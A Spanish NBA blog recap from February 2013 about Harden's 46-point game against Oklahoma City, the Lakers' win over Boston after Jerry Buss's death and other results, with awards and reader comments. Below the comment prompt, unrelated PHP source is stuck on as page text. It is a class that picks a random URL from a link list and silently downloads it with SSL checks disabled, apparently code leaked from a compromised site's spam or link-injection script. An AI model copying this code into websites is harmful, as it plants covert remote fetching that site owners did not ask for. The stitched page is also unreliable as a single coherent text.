La Crónica: Fear the Beard

21 de February de 2013 por Simon

Interesantísima jornada  vivida ayer en la NBA con homenajes, rivalidades históricas, partidos  entre equipos de Play Off, jugadores que se reencontraban con su anterior equipo, etc.

En el capítulo de reencuentros, destaca la victoria de Houston Rockets sobre los Oklahoma City Thunder. El partido fue un auténtico escándalo con ambos equipos jugando posesiones cortas a un ritmo muy elevado y practicando un gran baloncesto. Mediado el último cuarto, el partido parecía romperse de manera definitiva. Con dos triples seguidos de Martin y Sefolosha Thunder se ponía +14 pero a partir de ese momento Harden comenzó a anotar canastas de todos los tipos y colores y, bien apoyado por Lin con un par de triples y un par de canastas de dos puntos, consiguió darle la vuelta al marcador (119-122).  Los Thunder se vieron incapaces de parar al huracán Harden que acabó con 46 puntos, máximo de carrera, y aportó 8 rebotes y 6 asistencias. No podemos dejar pasar por alto el partidazo de su compañero Jeremy Lin que terminó el partido con 29 puntos, 6 rebotes y 8 asistencias. Durant logró un triple doble aunque lanzó muy mal a canasta pero lo más sorprendente fueron los 28 puntos de Sefolosha. En el otro ‘Remember when’ de la noche, Memphis visitaba Toronto para reencontrarse con Rudy Gay.  Si han de guiarse solo por el partido de ayer, los ositos no deben de arrepentirse  del traspaso realizado pues Gay tuvo una noche horrible y Memphis jugó un gran partido colectivo que les hizo controlar el partido con suficiencia durante los 48 minutos (88-82). 

Por primera vez tras la muerte de Jerry Buss, Lakers jugaba en el Staples y precisamente lo hacían ante su mayor enemigo, Boston Celtics. Al inicio del partido hubo varios homenajes para el desaparecido propietario Lakers e incluso Kobe Bryant dijo unas palabras en honor a Buss. En lo que refiere al partido, Lakers entró muy enchufado al partido y desde el primer cuarto logró una importante ventaja que le hizo jugar el resto del partido muy relajados y con cómodas ventajas en el marcador. Tan sólo en el tercer cuarto Boston pudo acercarse un poco en el marcador, pero los Lakers se mostraron ayer muy superiores y no dieron ninguna opción a los Celtics. El partido acabó con una diferencia de 14 puntos pero pudieron ser unos cuantos más (99-113). El mejor amarillo fue Howard con 24 puntos y 12 rebotes acompañado en la pintura por los 14 puntos y 16 rebotes de Clark. Bryant, ante lo plácido del juego, dio un paso a un lado y dejó hacer a sus compañeros. Además Nash anoche superó a Magic Johnson en la lista de máximos asistentes y se coloca en cuarta posición. Su próxima víctima será probablemente Mark Jackson, el actual entrenador de los Warriors, pero habrá que esperar a la temporada que viene para eso.

En la conferencia Este anoche hubo varios enfrentamientos directos entre equipos de PO. Indiana venció en casa a unos Knicks que apenas plantaron cara al tercer clasificado del Este que al descanso ya le ganaban por 30 (91-125). El mejor Pacers fue como de costumbre Paul George con 27 puntos y 8 rebotes. Danny Granger tampoco volvió a la acción anoche.  Milwaukee Bucks cayó por segunda vez en dos días ante Nets (97-94), y lo hicieron de nuevo de manera igualada. Los de Brooklyn, tras ir por debajo todo el partido, consiguieron una pequeña ventaja a falta de un minuto. Monta Ellis forzó una falta en la última jugada y dispuso de 3 tiros libres para igualar el marcador pero no anotó ningún tiro y el partido acabo con victoria para los Nets que deja a los Bucks con récord negativo aunque todavía con un buen margen para entrar en Play Off. Por su parte, Miami Heat venció a Atlanta sin excesivos problemas a pesar de que los Hawks dispusieron todo el partido de ventajas importantes. Parece un contrasentido pero siempre dio la sensación de que Miami controlaba total y absolutamente el partido y así fue… A Miami le bastó con el último cuarto para vencer de forma plácida (103-90). Lebron hizo otro partidazo más con 24 puntos, 11 asistencias y 6 rebotes. Wade se quedó en 20 puntos.

Golden State Warriors volvió por fin a la senda de la victoria ante Phoenix Suns gracias al gran partido de su backcourt compuesto por Curry, Thompson y Jack que se combinaron para lograr 69 puntos, 19 asistencias y 12 rebotes.  Los Warriors siempre fueron por encima en el marcador y aunque nunca pudieron despegarse definitivamente, los acercamientos de Suns fueron muy tímidos. Golden State rompió la racha de 6 derrotas seguidas que le ha hecho de pasar de competir por la cuarta plaza a tener que defender la sexta (98-108). En otro duelo del Oeste, Minnesota venció a Philadelphia 76ers de la mano de un espectacular rendimiento de su pareja interior, Pekovic-Williams, que hicieron que anoche no se echara de menos a Love. Buen rendimiento de Derrick Williams últimamente gracias a que está disfrutando de los minutos y la confianza que antes no tenía (87-94). Por parte de Sixers, apenas Holiday y Turner sacan la cara día a día por este equipo. Ricky Rubio jugó un partido completo y terminó con 11 puntos, 6 rebotes y otras tantas asistencias.

Dando un vistazo a los partidos de los equipos del fondo de la clasificación,  encontramos la victoria de Detroit ante Charlotte (105-99); Irving se salió con 35 puntos en la victoria de los Cavs sobre New Orleans Hornets (100-105), y Dallas sigue intentando luchar por los Play Off y anoche venció a Orlando gracias a un gran último cuarto (96-111).

PREMIOS

MVP: Apabullante partido de James Harden del que ya hemos dado referencias. Hay que destacar que el jugador de los Rockets consiguió los 46 puntos con apenas 19 canastas en juego. Encestó 14, un acierto brutal. No menos brutal fue el partido de Kyrie Irving, autor de 35 puntos, 5 rebotes y 7 asistencias. Lo tremendo es que anotó 20 puntos en el último cuarto.

Rookie: Buen partido de Michael Kidd-Gilchrist (11 puntos y 6 rebotes) con mega mate sobre Greg Monroe incluido. Dion Waiters anotó 16 puntos.

Sorpresa: Sabemos que defiende muy bien pero no teníamos constancia de que Thabo Sefolosha era capaz de anotar 28 puntos en un partido. Por su parte, Jermaine O’Neal nos sigue maravillando con su nivel actual. Doble-doble para él con 17 puntos y 12 rebotes.

Decepción: Partido para olvidar de los New York Knicks. Jeff Teague tampoco vivió su mejor noche, tiró más veces que puntos anotó y además perdió 6 balones.

Esfuerzo en vano: Segundo gran partido consecutivo de Brandon Jennings y segunda derrota frente los Nets. De nuevo, sus más de 30 puntos y 10 asistencias no sirvieron para llevarse la victoria.

EL DATO

Desde 1985 sólo 8 jugadores han sido capaces de anotar 45 o más puntos con 20 canastas o menos: Willie Burton, Josh Howard, Kevin Martin, Gilbert Arenas, Manu Ginobili, Adrian Dantley, Rashard Lewis y James Harden. El jugador de los Rockets es el único que lo ha hecho en 2 ocasiones: una en noviembre (45 puntos con un 14 de 19 frente los Hawks) y ayer mismo.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Ekos dice:
    #1

    Cuidado con mis Cavs en unos añitos.

      Citar

  2. txusma dice:
    #2

    Ekos:
    Cuidado con mis Cavs en unos añitos.

    Kyrie Irving es un escándalo.

      Citar

  3. MagicJohnson32 dice:
    #3

    Qué brutalidad de partido se ha marcado Harden. No hay palabras.

    Del Lakers-Celtics, victoria cómoda de LA en gran parte gracias a Howard. Estuvo muy activo en defensa, y en ataque al fin hizo bloqueos convincentes, duros y efectivos, y así sacó mucho provecho en situaciones de pick & roll con Nash y Kobe. Buena labor ofensiva de los Lakers, con movimiento constante del balón, una cifra de pérdidas más que aceptable y 7 jugadores con +10 puntos. Por los Celtics, Pierce los sostuvo un buen rato, hasta el descanso. Courtney Lee estuvo bien y Green hizo un partido completo, pero ya está, el equipo pareció cansado o muy superado cerca del aro e incapaz de llevar el ritmo del partido.

      Citar

  4. melo15 dice:
    #4

    A mi la verdad, todo y siendo de los Knicks no estoy tan convencido de ser el segundo mejor equipo del Este.
    Des de el gran principio de temporada los Knicks han ido bajando su nivel y ya llevan unos meses muy irregulares, sobretodo Carmelo que unos dias te hace una 15 de 20 I otras un 6 de 25
    Parece que el equipo no es ran bueno porque no Kidd ni Shumpert ni incluso Felton estan dando el rendimiento que se esperaba de ellos.
    Haber cuando Melo pone el modo Playoffs ON porque si no no pasamos de Semifinales.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>